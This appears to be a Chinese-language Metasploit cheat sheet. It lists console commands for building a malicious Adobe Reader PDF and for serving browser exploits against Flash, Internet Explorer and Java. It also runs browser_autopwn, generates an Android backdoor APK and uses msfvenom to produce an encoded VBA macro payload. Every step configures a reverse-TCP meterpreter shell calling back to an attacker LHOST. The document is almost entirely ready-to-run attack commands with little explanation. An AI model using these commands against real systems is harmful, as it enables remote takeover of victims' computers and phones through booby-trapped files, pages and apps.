利用adobe reader漏洞执行payload
构造pdf文件
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set lhost 1.1.1.1
msf exploit(adobe_utilprintf) > exploit
利用网址构造
msf > use exploit/windows/browser/adobe_utilprintf
msf exploit(adobe_utilprintf) > set srvport 80
msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set lhost 192.168.56.103
msf exploit(adobe_utilprintf) > set lport 4445
msf exploit(adobe_utilprintf) > set uripath /pdf
flash利用
msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf
msf > use exploit/multi/browser/adobe_flash_opaque_background_uaf
浏览器自动利用
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set srvport 80
msf auxiliary(browser_autopwn) > set uripath /
msf auxiliary(browser_autopwn) > run
IE浏览器漏洞
msf > use exploit/windows/browser/ms14_064_ole_code_execution
jre利用漏洞
msf > use exploit/multi/browser/java_jre17_driver_manager
msf > use exploit/multi/browser/java_jre17_jmxbean
msf > use exploit/multi/browser/java_jre17_reflection_types
android后门程序生成
msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set lhost 1.1.1.1
msf payload(reverse_tcp) > generate -f a.apk -p android -t raw
宏代码生成
root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe